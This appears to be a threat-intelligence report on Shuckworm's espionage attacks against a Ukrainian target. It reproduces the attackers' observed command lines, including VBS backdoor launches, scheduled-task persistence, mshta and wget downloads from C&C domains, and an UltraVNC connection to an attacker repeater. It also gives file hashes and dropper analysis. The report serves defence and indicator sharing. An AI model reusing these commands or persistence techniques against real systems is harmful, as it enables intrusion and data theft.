Shuckworm Continues Cyber-Espionage Attacks Against Ukraine

At 08:48 (local-time), a suspicious Word document is opened on the machine.
Just five minutes after the document is opened, a suspicious command is also executed to launch a malicious VBS file (depended.lnk). This file is a known custom backdoor leveraged by Shuckworm (aka Pterodo).

wscript.exe CSIDL_PROFILEsearchesdepended.lnk //e:VBScript //b
The backdoor is used to download and execute CSIDL_PROFILEsearchesdepended.exe (94a78d5dce553832d61b59e0dda9ef2c33c10634ba4af3acb7fb7cf43be17a5b) from hxxp://92.242.62.131/wordpress.php?is=[REDACTED].

Two additional VBS scripts are observed being executed via depended.exe:

“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdataroamingreflect.rar //e:VBScript //b
“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltempdeep-thoughted. //e:VBScript //b
A scheduled task is then created to likely ensure persistence between system reboots and to execute the dropped script. This ensures the VBS file deep-thoughted.ppt is executed every 10 minutes:

SCHTASKS /CREATE /sc minute /mo 10 /tn “deep-thoughted” /tr “wscript.exe ” CSIDL_COMMON_PICTURESdeep-thoughted.ppt //e:VBScript //b” /F
Later, the attackers are observed executing an HTA file hosted on a remote server by abusing mshta.exe via depended.exe. The Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions. Since mshta.exe executes outside of Internet Explorer’s security context, it also bypasses browser security settings.

“CSIDL_SYSTEMcmd.exe” /c CSIDL_SYSTEMmshta.exe hxxp://fiordan.ru/FILM.html /f id=[REDACTED]
At the same time, a new variant of Pterodo is installed via depended.exe.

Similarly to before, two additional scheduled tasks are created:

“CSIDL_SYSTEMschtasks.exe” /CREATE /sc minute /mo 12 /tn “MediaConverter” /tr “wscript.exe ” CSIDL_COMMON_MUSICtvplaylist.mov //e:VBScript //b ” /F”
“CSIDL_SYSTEMschtasks.exe” /CREATE /sc minute /mo 12 /tn “VideoHostName” /tr “wscript.exe ” CSIDL_COMMON_VIDEOwebmedia.m3u //e:VBScript //b ” /F”
The attackers continue to install variants of their backdoor and execute commands via scripts to ensure persistence:

“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp22333.docx //e:VBScript //b
“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp9140.d //e:VBScript //b
wscript.exe CSIDL_COMMON_MUSICtvplaylist.mov //e:VBScript //b
schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr “wscript.exe C:Userso.korolAppDataRoamingbatterybattery.dat //e:VBScript //b”
“CSIDL_SYSTEMcmd.exe” /c CSIDL_PROFILEappdataroamingbatterybattery.cmd
Directly after this, it appears the attackers test connectivity to a new C&C server via ping.exe:

CSIDL_SYSTEMcmd.exe /c ping -n 1 arianat.ru
Once the connection is confirmed to be active, the attackers proceed to download another variant of their Pterodo backdoor and begin using the new C&C to download additional scripts and tools, as well as creating scheduled tasks to run every few minutes.

“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp12382. //e:VBScript //b
“CSIDL_SYSTEMcmd.exe” /c CSIDL_SYSTEMmshta.exe hxxp://avirona.ru/7-ZIP.html /f id=
CSIDL_SYSTEMmshta.exe hxxp://avirona.ru/7-ZIP.html /f id=
“CSIDL_SYSTEMschtasks.exe” /CREATE /sc minute /mo 12 /tn “MediaConverter” /tr “wscript.exe ” CSIDL_COMMON_MUSICmediatv.mov //e:VBScript //b ” /F”
“CSIDL_SYSTEMschtasks.exe” /CREATE /sc minute /mo 12 /tn “VideoHostName” /tr “wscript.exe ” CSIDL_COMMON_VIDEOvideotv.m3u //e:VBScript //b ” /F”
At this point, the attackers cease activity. However, analysts continue to see commands being executed from the scheduled tasks for the remainder of July 14.

The attackers, then, return, and several additional variants of Pterodo are executed via CSIDL_COMMON_VIDEOplaneta.exe (1ea3881d5d03214d6b7e37fb7b10221ef51782080a24cc3e275f42a3c1ea99c1).

“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp32440.docx //e:VBScript //b
“CSIDL_SYSTEMwscript.exe” CSIDL_PROFILEappdatalocaltemp20507.d //e:VBScript //b
The attackers are then observed executing commands via planeta.exe:

CSIDL_SYSTEMcmd.exe /c “”CSIDL_PROFILEappdatalocaltemp7zsfx000.”” “”
“CSIDL_SYSTEMcmd.exe” /c ipconfig /flushdns
The above flushdns command may indicate that the attackers have updated the DNS records for their C&Cs, as analysts observed some of their tools use hard-coded domains. In this particular instance, the flushdns command was executed shortly before the attackers attempted to install additional backdoors that leveraged the same C&C.

Later, another variant of Pterodo (deep-sided.fly) was executed and was used to download and execute a new file called deerskin.exe (ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29). This file is a dropper for a VNC client. When executed, it pings google DNS (8.8.8.8) to test internet connectivity, then proceeds to drop a VNC client and establishes a connection to a remote C&C server controlled by the attackers:

“%USERPROFILE%ContactsDriversHood.exe” -autoreconnect -id:2097 -connect mucoris.ru:5612
Two such files have been identified that perform the same actions:

1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f
ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29
This VNC client appears to be the ultimate payload for this attack.

During the course of this incident, specifically post VNC client installation, a number of documents were opened from various locations on the compromised machine.
It is unclear if this was legitimate user activity or the activity of the attackers attempting to collect and exfiltrate sensitive information.
Titles of the documents accessed ranged from job descriptions to sensitive information pertaining to the targeted organization.

Thorough investigations uncovered a total of seven files used by Shuckworm in recent attacks.
All seven files are 7-zip SFX self-extracting binaries, a format used previously in Shuckworm attacks.

descend.exe

Upon execution, the file named descend.exe (0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137) drops a VBS file which, in turn, drops a second VBS file in the following locations:

%USERPROFILE%Downloadsdeerbrook.ppt
%PUBLIC%Picturesdeerbrook.ppt
It then creates the following task:

SCHTASKS /CREATE /sc minute /mo 11 /tn “deerbrook” /tr “wscript.exe ‘deerbrook.ppt’ //e:VBScript //b” /F
The file deerbrook.ppt (b46e872375b3c910fb589ab75bf130f7e276c4bcd913705a140ac76d9d373c9e) VBS file contacts a command-and-control (C&C) server at deep-pitched.enarto.ru. If the C&C server is available, a HTTP POST request is sent to download a payload, which is saved in the %USERPROFILE% folder as deep-sunken.tmp then renamed to deep-sunken.exe and executed. The binary is then deleted.

deep-sunken.exe

Upon execution, the file deep-sunken.exe (02c41bddd087522ce60f9376e499dcee6259853dcb50ddad70cb3ef8dd77c200) drops the following files on the compromised computer:

%APPDATA%babybaby.cmd
%APPDATA%babybaby.dat
%APPDATA%babybasement.exe (wget binary)
%APPDATA%babyvb_baby.vbs
It then creates the following task:

schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr “wscript.exe [%APPDATA%]babybaby.dat” //e:VBScript //b
It then connects to a C&C server (arianat.ru) to download another payload using wget:

basement.exe –user-agent=”Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64::[VICTIM_ID]::/.beagle/.” -q -b -c -t 2 “hxxp://arianat.ru/baby.php” -P “[%APPDATA%]baby”
The baby.dat file is a VBS file that executes baby.cmd, which then downloads and executes the payload from the C&C server.

The vb_baby.vbs file renames the downloaded payload from baby.php to backed.exe.

The downloaded payload (backed.exe) could not be retrieved. However, the following files were also obtained during investigation:

z4z05jn4.egf.exe

The file z4z05jn4.egf.exe (fd9a9dd9c73088d1ffdea85540ee671d8abb6b5ab37d66a760b2350951c784d0) is similar to the previous file (deep-sunken.exe) but with different folders, file names, and C&C server (iruto.ru).

defiant.exe

Once executed, the file defiant.exe (a20e38bacc979a5aa18f1954df1a2c0558ba23cdc1503af0ad1021c330f1e455) drops a VBS file in the following locations:

%TEMP%\deep-versed.nls
%PUBLICPicturesdeep-versed.nls
It then creates the following task:

SCHTASKS /CREATE /sc minute /mo 12 /tn “deep-versed” /tr “wscript.exe “[%PUBLIC%]\Pictures\deep-versed.nls” //e:VBScript //b” /F
The dropped file deep-versed.nls (817901df616c77dd1e5694e3d75aebb3a52464c23a06820517108c74edd07fbc) downloads a payload from a C&C server (deep-toned.chehalo.ru) and saves it as deep-green.exe in the following location:

%PUBLIC%Downloads
deep-green.exe

The file deep-green.exe (1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f) contains an UltraVNC binary, which upon execution connects to a repeater (mucoris.ru:5612) using the following command line:

-autoreconnect -id:%RANDOM% -connect mucoris.ru:5612
UltraVNC is an open-source remote-administration/remote-desktop-software utility.

deep-green.exe

A second file named deep-green.exe (f6c56a51c1f0139036e80a517a6634d4d87d05cce17c4ca5adc1055b42bf03aa) contain a Process Explorer (procexp) binary.

Process Explorer is a freeware task manager and system monitor for Microsoft Windows.

deep-green.exe

A third file called deep-green.exe (de5a53a3b75e3e730755af09e3cacb7e6d171fc9b1853a7200e5dfb9044ab20a) is similar to descend.exe (0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137) just with different file names and C&C server (deer-lick.chehalo.ru).

deep-green.exe

The fourth and final file named deep-green.exe (d15a7e69769f4727f7b522995a17a0206ac9450cfb0dfe1fc98fd32272ee5ba7) drops a VBS file in the following location:

%PUBLIC%Music
It then creates the following task:

“/CREATE /sc minute /mo 12 /tn “MediaConverter” /tr “wscript.exe “C:\Users\Public\Music\MediaConvertor.dat” //e:VBScript //b ” /F”
The MediaConvertor.dat file searches for removable drives and creates a .lnk file with the following command:

mshta.exe hxxp://PLAZMA.VIBER.ontroma.ru/PLAZMA.html /f id=January

Sign Up For Threat Alerts

Loading...
Threats Icon

Jan 29, 2023

APT15 Targets Multiple Sectors With Turian Backdoor

APT15, also known as Playful Taurus, is an advanced persistent threat (APT) that conducts a...

Threats Icon

Jan 26, 2023

Vice Society Ransomware Group Targets Manufacturing Companies

The Vice Society threat group was discovered targeting multiple sectors including manufacturing companies in Brazil....

Threats Icon

Jan 26, 2023

US Cert Alert – Alert (AA23-025A) Protecting...

Although this campaign appears financially motivated, the authoring organizations assess it could lead to additional...

Threats Icon

Jan 25, 2023

Emotet Malware Makes a Comeback with New...

The Emotet malware operation has continued to refine its tactics in an effort to fly...

Threats Icon

Jan 25, 2023

DragonSpark

The DragonSpark attacks represent the first concrete malicious activity where Analysts observe the consistent use...

Threats Icon

Jan 25, 2023

PLAY Ransomware

PLAY is simple but heavily obfuscated with a lot of unique tricks that have not...

Threats Icon

Jan 24, 2023

Gamaredon Abuses Telegram To Target Ukrainian Government...

The Gamaredon APT group was discovered targeting Ukrainian government entities using the Telegram messaging service...

Threats Icon

Jan 23, 2023

NeedleDropper: A New Dropper-as-a-Service Uncovered

Avast's Threat Research Team has since October 2022 been observing a new strain of dropper...

Threats Icon

Jan 22, 2023

Aurora Stealer Leverages Shapeshifting Tactics And Popular...

A threat actor was discovered mimicking legitimate websites to host and deliver the 9002 RAT,...

Threats Icon

Jan 19, 2023

Earth Bogle Campaign Targets Entities With Geopolitical...

Middle Eastern geopolitical themed lures were used to distribute njRAT across the Middle East and...

Threats Icon

Jan 18, 2023

The NoName057(16) Hacktivist Group Targets Ukraine Supporters...

The NoName057(16) hacktivist group targeted multiple sectors across Ukraine and neighboring countries with DDoS attacks....

Threats Icon

Jan 17, 2023

Italy Targeted By Information Stealer Malware

An un-named information stealer was targeting end users in Italy through a phishing campaign using...

Threats Icon

Jan 15, 2023

The Australian healthcare industry was targeted by...

The Australian healthcare industry was targeted by the Gootkit loader malware; initial access was gained...

Threats Icon

Jan 11, 2023

Shc Linux Malware Used To Install XMRig...

External facing Linux servers in South Korea were targeted with a Shc (Shell Script Compiler)...

Threats Icon

Jan 11, 2023

Dridex Returns To Target MacOS With Updated...

Threat actors have been seen targeting Mac users with the Dridex malware. Although the malware...